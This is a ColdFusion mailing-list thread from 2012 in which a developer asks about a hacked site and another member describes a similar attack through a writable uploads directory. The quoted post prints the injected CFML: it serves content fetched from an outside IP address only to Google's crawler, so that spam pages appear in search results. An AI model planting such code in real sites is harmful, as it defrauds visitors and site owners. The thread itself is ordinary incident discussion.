I've seen something like this on a shared server that was running osCommerce. The uploads directory had the wrong permissions set, the attacker uploaded a server admin script that could set permissions on other directories. They were then able to inject code into every index.php, index.html, index.cfm files it found.
If you are on a shared environment I would look for this type of attack on the server. Best Regards, Donnie Bachan "Nitendo Vinces - By Striving You Shall Conquer" ====================================================================== The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Tue, Nov 13, 2012 at 9:56 PM, Yuliang Ruan <[email protected]>wrote: > > >Recently a site of ours got hacked - basically, a Google search the site > >was returning viagra info! > >What we got was a small script added to the end of a functions.cfm file: > > > ><cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( > >"google", REQUEST.UserAgent )) > > ><cfhttp method="get" > >url="http://168.16.228.250/fms/ > "><cfoutput>#cfhttp.filecontent#</cfoutput></cfif> > > > >I'm not the server admin for this site, so they're sorta pointing the > >finger at us developers, and we're pointing fingers back at them about > >lax server security. We've got a boatload of stuff on this site to > >prevernt SQL injection, including Justin D. Scott's application script, > >carefully checking anything to goes into the database, client and server > >side form validation, blah, blah, blah... > > > >Anybody seen the above, and if so, thoughts? Anybody manage to determine > >how the exploit happened to start with? > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353149 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
